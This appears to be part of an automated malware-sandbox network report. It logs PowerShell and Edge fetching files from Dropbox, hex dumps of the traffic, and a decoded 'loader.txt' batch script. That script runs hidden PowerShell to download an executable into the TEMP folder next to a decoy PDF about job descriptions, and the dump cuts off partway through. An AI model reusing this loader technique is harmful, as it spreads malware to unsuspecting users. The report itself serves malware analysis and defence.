                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: ed 08 fe 6b 7f 97 c9 4d ac db 7d 7e 53 f3 d4 4a 3e cf 74 f6 71 c7 1a ac b3 2e cf b4 6d f9 1b fe 03 54 21 b0 95 64 9a 68 63 b1 58 ee 9f 6c 33 5b ed 89 93 1f 7b ef d6 1b c7 b3 2a fe f5 d6 c6 dd 9f 8f fc 3c 9a 6e d6 bb dc aa 8a be 4f 90 db 5f f0 db 49 6b e2 18 2e 37 dc 58 df ed 91 92 46 47 86 0f 37 7f fc 03 f8 6b 17 fb 31 9a 0f 31 a7 f3 e3 fb d3 5c 24 eb b9 d7 d9 7f a8 aa 36 b6 4d 6f 23 b4 97 7b 77 3f ef 66 de b1 33 a9 fb bf 8f d2 a6 74 f9 b5 4e c2 f6 8d 68 76 5a 7a 4a f6 b3 49 67 77 fe 90 bb 59 f7 ed f2 9f e5 fe 05 fe 1c d4 cd 61 73 67 27 fa 1c 91 cb 78 a8 cc e9 34 ff 00 7d 7f d9 fe fe 2b 06 c6 7f 2e 0b 85 f3 27 fd d7 ee 91 e1 45 ff 00 56 7a be 6a 58 6d e2 96 08 6c ee 20 92 e3 6a 7c ee f2 79 4c 99 fb b8 26 b5 8c 5c a1 ea 3f 75 f4 25 be b8 f1 2d ad 8f f6 84
                                                                                                                                                                                                                                                                  Data Ascii: kM}~SJ>tq.mT!dhcXl3[{*<nO_Ik.7XFG7k11\$6Mo#{w?f3tNhvZzJIgwYasg'x4}+.'EVzjXml j|yL&\?u%-
                                                                                                                                                                                                                                                                  2024-12-19 12:44:20 UTC16384INData Raw: f7 5b da a8 df 78 e7 c6 73 d8 bd aa f8 97 ec bf b9 f2 9e 68 60 8d 77 af fb f5 f4 18 75 8c c4 d3 55 23 78 a7 de 4e ff 00 73 1c 68 c6 1a 3b 0f d4 5f f6 a0 fe d5 76 b2 82 d6 7f de b7 fa 0e f5 95 b6 9e d8 c7 a5 43 3f 83 bf 68 bb 2b 18 57 5f b7 d2 e0 b7 ba 7d d6 f3 79 9b a5 b6 cf 75 db e9 54 34 df 16 f8 ab 4b 92 1b 88 7c 6f 3d bc 8b f7 fe 7d be 77 f7 aa 4b 1f 8b 77 9a 0d f7 9d a5 f8 a3 c4 77 13 6f 66 44 79 da 58 bf ef 96 e2 bb 29 e5 b8 89 4b f7 b1 8b 8f fd bc bf cc 49 51 50 f8 ac ce cb c2 b6 7f 19 b4 8d f2 5d 6a da 6d e4 76 a9 e6 bb fd 87 fd 72 8e c7 a6 da e6 3e 2a 7c 3d d1 75 ed 7e c7 c5 da 96 bd a0 78 6a 4d 5a dd 65 b8 b6 b4 93 cf df 9f e2 d9 d7 76 3d eb 95 f8 85 f1 7f c6 7e 28 b5 b7 6d 63 52 9e ea 15 fb e9 16 d5 df fe f6 df bc be d5 e7 77 1e 24 d4 a2 9a 6b
                                                                                                                                                                                                                                                                  Data Ascii: [xsh`wuU#xNsh;_vC?h+W_}yuT4K|o=}wKwwofDyX)KIQP]jmvr>*|=u~xjMZev=~(mcRw$k


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  9192.168.2.649749162.125.69.184436972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:24 UTC212OUTGET /scl/fi/eq3zzfmbzxl2qzjzw9o23/loader.txt?rlkey=bmuqypu1j3oi6li0xv4rbm694&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  2024-12-19 12:44:25 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.co [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com/cd/0/get/CggX9InEjGrp3qf5MHF2B-OZg-4el73KgEMwt4fA3P4OxQ1dBqCjlYeqWm_pLfNpEOenkY4rC6FQnawF-cBRbf1H8PZyS2PBB4ZUbf8C32F05eNinNm8YheNnhmW_EgQzZFqlAxCZux4XWm7iOA3xXbe/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MTk3MzEyODI2MDAzNjg3ODEzMjE5MjUzNTAyNDE2NzA1MTQ2MzI0; Path=/; Expires=Tue, 18 Dec 2029 12:44:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=H6ZcHzd1ZC99NSTk5KncudSd; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=H6ZcHzd1ZC99NSTk5KncudSd; Path=/; Expires=Fri, 19 Dec 2025 12:44:24 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=lOqnCuc7L0; Path=/; Expires=Fri, 19 Dec 2025 12:44:24 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:24 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:24 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 1ba709295e984907b6d6d10676a44a6a
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:25 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  10192.168.2.649759162.125.69.154436972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:26 UTC370OUTGET /cd/0/get/CggX9InEjGrp3qf5MHF2B-OZg-4el73KgEMwt4fA3P4OxQ1dBqCjlYeqWm_pLfNpEOenkY4rC6FQnawF-cBRbf1H8PZyS2PBB4ZUbf8C32F05eNinNm8YheNnhmW_EgQzZFqlAxCZux4XWm7iOA3xXbe/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734593172360660d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 118
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:27 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 839
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: fba0fd8f42da4ea0b68734c2a8a96b92
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC839INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 49 6e 64 6f 57 53 74 59 4c 65 20 68 69 44 64 65 4e 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 70 64 66 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 65 78 65 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55
                                                                                                                                                                                                                                                                  Data Ascii: @echo offpowershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -U


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  11192.168.2.649767162.125.69.184437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC806OUTGET /scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC4094INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https:// [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://ucdccc1744965d58711471073024.dl.dropboxusercontent.com/cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP_aT5dupnmUVOfBLFnwetufinSGQQ-e/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=Mjk0Njg3MDEyNzA0NjgzNTg3MTM1MDAyNzEzNzk5NTQ0MDA5NTk5; Path=/; Expires=Tue, 18 Dec 2029 12:44:27 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=hhAIRBtJd55ByE0qDhIpvYUV; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:27 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=hhAIRBtJd55ByE0qDhIpvYUV; Path=/; Expires=Fri, 19 Dec 2025 12:44:27 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=iSYPz_5w3Y; Path=/; Expires=Fri, 19 Dec 2025 12:44:27 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:27 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:28 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 36a4cfda4b3449f9a6269ace6bcbf41c
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:28 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  12192.168.2.649779162.125.69.154437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC888OUTGET /cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP_aT5dupnmUVOfBLFnwetufinSGQQ-e/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: ucdccc1744965d58711471073024.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Documents about company information and job descriptions (4).pdf"; filename*=UTF-8''Documents%20about%20company%20information%20and%20job%20descriptions%20%284%29.pdf
                                                                                                                                                                                                                                                                  Etag: 1734593169669779d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 169
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:30 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 656088
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: fbc80e8ad790442a907fafc5607b0a58
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC15614INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1
                                                                                                                                                                                                                                                                  Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:u
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: d7 89 da 24 e2 8b 14 92 13 3b 54 4c a2 3d 9b b4 9b 56 70 94 3b a4 a0 9a 08 ba fa 92 7e 9a 5e fe 84 c6 71 1d 91 0f e6 19 fd 59 f1 36 df 82 1f e2 46 4a be 29 2b 0e 60 bc 93 81 2e 0b 80 9e 3c 57 c4 1c af 36 f6 a5 b3 27 33 a6 1c 38 bd ba 80 5e 5d 30 28 57 28 4b d1 df b8 9a 34 f1 d8 a5 cf b5 e1 32 b6 59 07 e1 ee b0 f4 4c 72 cf 9a c8 4d 0a 5e d6 b7 53 f6 05 40 66 85 fe ff db ff 83 8d 57 dc 4c a4 03 28 e0 c5 af c4 97 55 ea 90 9f 16 67 64 f9 3e 87 a2 0b 33 7e 5b a2 eb 6b 6f 94 6a aa 22 fd be b8 a9 bf 4a 24 ef b2 d7 cd 53 0f 54 88 03 f3 33 f6 22 95 e7 af b2 d4 b7 de 78 d8 3a 52 a5 16 4d 8a 00 5c 45 21 56 4e eb f8 61 df 5b 52 d7 16 b4 87 cd 5f 6b be a5 4b e5 69 62 bb b7 96 57 74 55 5c 82 28 8f eb 68 05 ae 79 06 04 c3 50 67 31 53 44 b1 ce aa 7d 8f 42 d2 e5 c4 27 8c
                                                                                                                                                                                                                                                                  Data Ascii: $;TL=Vp;~^qY6FJ)+`.<W6'38^]0(W(K42YLrM^S@fWL(Ugd>3~[koj"J$ST3"x:RM\E!VNa[R_kKibWtU\(hyPg1SD}B'
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC770INData Raw: 70 dc f4 43 13 52 5d cd f6 d3 9f 16 94 91 b4 59 49 95 56 08 c4 da 92 9a 4a 76 2c 78 96 f0 e2 37 76 fb 66 b8 0e 9b 92 88 23 7e 7d e3 e0 64 56 b8 0e 8b 92 78 a8 14 ca 0d 3e 88 9c 82 f4 e9 5b ff f3 b4 2e 98 14 c1 44 ab af 8d 37 25 ac 5e e6 83 5a e7 e9 d1 29 61 d4 b0 b5 77 a3 15 67 9e 88 91 bd b2 7b dc 7e 1c 52 3f e1 4e 06 9b 38 9d 13 3e f3 ce e3 ea 5d 53 7a 1a 2f 49 49 51 23 52 2f f2 46 12 41 c5 3c 8c 47 04 fe a2 fa fa 29 a8 40 cf 88 4b 46 42 de f5 8e 62 da 57 df 75 4d 29 78 fa 74 7f 0d 8b 97 35 bc 59 e9 e4 6c 66 c0 38 94 1a 83 4d f5 e7 e5 23 0e e5 7d 61 d2 3c 7a 69 11 43 4f 4f da d9 21 67 13 6d 4b 11 2d cd 30 a5 25 25 b9 84 cd 50 e3 23 ce 9d db f7 b5 b1 89 6a 3e 15 cc 05 bd 07 84 c6 3f 04 06 7f 0e 58 34 32 cc c8 40 91 2f 65 4a ce 0d f8 89 1a 91 e7 17 76 fa
                                                                                                                                                                                                                                                                  Data Ascii: pCR]YIVJv,x7vf#~}dVx>[.D7%^Z)awg{~R?N8>]Sz/IIQ#R/FA<G)@KFBbWuM)xt5Ylf8M#}a<ziCOO!gmK-0%%P#j>?X42@/eJv
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: fb 01 50 e9 9a 72 e3 97 0c 93 97 19 6e 70 d1 4d 63 57 77 39 c7 56 f3 86 4c f8 1b dd 09 3f 90 a0 27 e7 af c6 07 7b 08 86 69 f2 4d 25 e9 3f b8 4b e1 bc 8d 36 c5 df 47 d4 7e b1 2e 21 66 d0 b1 85 5c e4 1f 3f ee d2 7c 71 9c d6 d8 f1 15 eb f9 e6 66 45 3d 92 ee 0e 17 ac bf 34 1f 71 a1 f5 ce cc 2c 2f c3 4b e5 ca f0 53 27 1f 06 aa 92 e6 f2 3a 6d 46 74 fd f6 0a 9a 21 83 48 f2 da 0e 52 7d 43 ce d7 02 c7 5d cd 65 ed df 58 21 24 77 67 4b 8e cd da 87 64 fa c4 5f 4e 56 38 cb 25 f0 29 be 89 f5 75 df f7 c9 55 f6 4b 8d 23 6f 24 b3 6a e5 7f ca e6 26 d6 f1 9e 1b 36 51 92 55 0b 37 94 5c 7a 40 f9 42 fe 95 7b 7a 10 bb df 9d be 27 ce 17 16 18 b5 50 cd 33 4c 11 b8 ac 5a ad 31 f7 f8 6c e5 55 bb 7e 0d ba aa f3 a6 1b ed ea 04 0b 12 cc 8f 5b 67 33 be 1d a3 8c 80 0c c1 76 f4 9f 92 eb
                                                                                                                                                                                                                                                                  Data Ascii: PrnpMcWw9VL?'{iM%?K6G~.!f\?|qfE=4q,/KS':mFt!HR}C]eX!$wgKd_NV8%)uUK#o$j&6QU7\z@B{z'P3LZ1lU~[g3v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16084INData Raw: 79 f7 75 5c 75 9b d4 5c 90 37 42 10 38 8a 5b 7e 8f 56 ee 54 47 fa f6 e4 e5 37 9d 8e bd b6 9b 77 26 28 26 e8 c3 6a 68 c6 d7 6e 53 e8 89 71 57 c6 39 35 fe cf b0 c8 50 4a e6 74 e9 2e 98 ee 35 ae 80 ef 37 4a 2c a2 05 79 8a fc 99 04 c6 23 c2 ef a6 3a 75 f0 3a c1 4c 05 29 e4 ed 5f af 8d 3d 3d 9f 7a bf 96 dd d4 47 87 a8 4e 30 49 75 d0 20 1c b7 27 a2 37 ae cf f1 e0 24 aa 34 5f 47 8e 67 0d e8 de 0c 93 81 77 13 ee f5 52 51 08 22 b3 fe 65 6f b3 03 ce 85 a4 0f fe 83 79 9a 06 46 b8 2e 8a 84 f8 70 af e4 38 8d 64 19 60 c2 4c 38 d5 16 d8 20 ce 53 d1 45 2d a1 e0 1c af 9c 97 0b 2c 64 31 ce 82 da 5c de 1b 4d af e4 6f 25 e9 e6 52 96 15 da 49 51 68 41 36 3a c5 ac cf 33 0e 12 9d 6d 15 94 64 a6 d0 3f 11 15 88 9b 19 c4 20 98 92 d8 95 6f 04 d6 d2 cb f1 9a e8 5f 5f dc e7 dc ea cd
                                                                                                                                                                                                                                                                  Data Ascii: yu\u\7B8[~VTG7w&(&jhnSqW95PJt.57J,y#:u:L)_==zGN0Iu '7$4_GgwRQ"eoyF.p8d`L8 SE-,d1\Mo%RIQhA6:3md? o__
